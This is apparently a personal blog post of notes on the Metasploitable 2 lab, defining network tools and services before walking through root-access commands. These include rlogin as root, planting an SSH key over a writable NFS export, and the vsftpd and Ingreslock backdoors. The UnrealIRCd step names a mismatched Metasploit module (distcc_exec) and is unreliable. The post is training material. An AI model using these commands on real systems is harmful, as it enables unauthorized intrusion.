This is really more of a post for me, here you can find my notes while following the metasploitable walkthrough found here: https://metasploit.help.rapid7.com/docs/metasploitable-2-exploitability-guide
There are some definitions and summaries of some of the tools and vulnerabilities and than further down you can see the actual method of exploiting the vulnerabilities and using the tools.
msfconsole Commands Cheat Sheet: https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/
- The most popular interface to the metasploit framework (MSF)
- Provides an “all-in-one” centralized console that allows you to efficiently access virtually all of the options available in the MSF
Nmap (network mapper)
Commands Cheat Sheet: https://highon.coffee/blog/nmap-cheat-sheet/
- used to discover hosts and services on a computer network, builds a map of the network
- sends specially crafted packets to the target host(s) and analyzes their responses
- host discovery and operating-system detection provide more advanced service detection, vulnerability detection, and other features
- Nmap can adapt to network conditions including latency and congestion during a scan
Features of Nmap
- Host discovery – Identifying hosts on a network. For example, listing the hosts that respond to TCP and/or ICMP requests or have a particular port open.
- Port scanning – Enumerating the open ports on target hosts.
- Version detection – Interrogating network services on remote devices to determine application name and version number.[7]
- OS detection – Determining the operating system and hardware characteristics of network devices.
- Scriptable interaction with the target – using Nmap Scripting Engine[8] (NSE) and Lua programming language.
*TCP(Transmission Control Protocol) – core protocol of the internet protocol suite. Provides reliable, ordered, and error-checked delivery of stream of bytes between applications running on hosts communicating by an IP network.
*ICMP(Internet Control Message Protocol) – another main protocol for internet suite, used by network devices like routers to send error messages
RSH(Remote Shell)
- A command line program that can execute shell commands as another user as well as on another computer across a network
- Typically uses TCP(transmission control protocol) and port number 514
R Services
- “r” services (rlogin,rsh(shell),rexec(execution),rwho). The “r” stands for remote and can enable a hacker to gain remote access
- rlogin enables a user to log into a remote machine
- rexec offers remote command execution similar to rsh
- rwho reports information on currently logged users on a remote host
rpcinfo
Command Info https://www.computerhope.com/unix/urpcinfo.htm
- This command makes an RPC(Remote Procedure Call) call to an RPC server and reports back with what it finds
- Able to list all the registered RPC services with rpcbind on host
*RPC(Remote Procedure Call) – is a protocol that one program can use to request a service from a program located in another computer on a network.
*rpcbind – is a server that converts RPC program numbers into universal addresses. The host must be running this in order to make RPC calls on a server on that machine.
NFS(Network File System)
- A distributed file system protocol developed by Sun Microsystems
- Allows a user on a client computer to access files over a network
- Builds on the Open Network Computing Remote Procedure Call (ONC RPC) system which is an RPC system
SSH(Secure Shell)
- A cryptographic network protocol for operating network services securely over an unsecured network
- Provides a secure channel over an unsecured network in a client-server architecture
- Designed as a replacement for Telnet and for unsecured remote shell protocols such as rlogin, rsh, and rexec
VSFTPD(Very Secure FTP Daemon)
- An FTP(File Transfer Protocol) for Unix-like systems including linux
- Supports IPv6 and SSL
- Backdoor was discovered on vsftpd version 2.3.4, issuing “:)” as the username would gain a command shell on port 6200
Ingreslock
- Ingreslock is a legitimate service that locks parts of an Ingres database and uses the port 1524/TCP
- Often used as a malicious backdoor because connection to this port gives the hacker access to the machine
UnrealIRCd(UnrealRCD IRC daemon)
- An open source IRC(Internet Relay Char) daemon(Runs as background process)
- Available for Unix-like operating systems and windows
Metasploit 2 Walkthrough
Recon:
- Using “nmap we are able to scan the network for available hosts
nmap -sn 192.168.29.* - Again using nmap we will scan the addresses ports
nmap 192.168.29.130
R-Services
- Being that the “r” services were purposely misconfigured for this lab to allow connections from any host we can connect directly to the machine by utilizing port 513 “login”
- Ports 512,513,514 are each r-services which contain remote access
- With “rsh-client” installed on the attackers machine we can use rlogin to access the machine.
- Rlogin -l root 192.168.29.130
NFS(Network File System)
- Our victim system hosts a writable filesystem on port 2049 (nfs), this is a vulnerability
- For this attack we will want to install rpcbind as well as nfs-common, rpcbind allows us to use the command rpcinfo and nfs-common lets us use the showmount command
- We will first run rpcinfo to identify nfs
“rpcinfo -p 192.168.29.130” - Next we check that the root or the “/” of the file system is being exported
“showmount -e 192.168.29.130” or “showmount –exports 192.168.29.130” - Because SSH is running we will first generate a new SSH key on the attacking machine
ssh-keygen - Then we mount the NFS export and add the attacking machines key to the root user account’s authorized_keys file, In simpler terms we are creating a directory, mounting the victims drive to that directory, then append the authorized key we generated and placing it into the victims file
- First we make the directory
mkdir /tmp/r00t - Mount the drive to the file we just created, we use -t to specify the file types to mount
mount -t nfs 192.168.29.130:/ /tmp/r00t/ - We then use the cat command to append the authorized key to the victims file
cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys - We will then unmount the drive as it is no longer needed
Umount /tmp/r00t - Lastly we must update the ssh-agent with our new key
ssh-add - Now that we are all setup and authorized we can ssh right into the machine
ssh 192.168.29.130
VSFTPD Backdoor
- Looking at our nmap results we can see that a ftp server is being used on port 21. Fortunately for us this ftp server utilizes the vulnerable version of vsftpd that contains a backdoor
- To utilize this backdoor we must use a username that ends with “:)”
telnet 192.168.29.130 21 - Inserting this username will open a listening shell on port 6200, once port 6200 is opened we can then gain access to the victims machine
telnet 192.168.29.130 6200
UnrealIRCd Backdoor
- Our nmap results show that on port 6667 there is an irc server
- UnrealIRCd is a very common irc server used and the version used on our host machine had backdoor which was triggered by sending the letters “AB” followed by a system command to the server on any listening port.
- For this example we will exploit this vulnerability using the metasploit module
msfconsole
use exploit/unix/misc/distcc_exec
set RHOST 192.168.29.130
Exploit - You now have an interactive shell
Ingreslock Backdoor
- Knowing about the Ingreslock backdoor and seeing that it is being used on our victims machine on port 1524 we can easily gain access to the host machine
Telnet 192.168.29.130 1524
Leave a Reply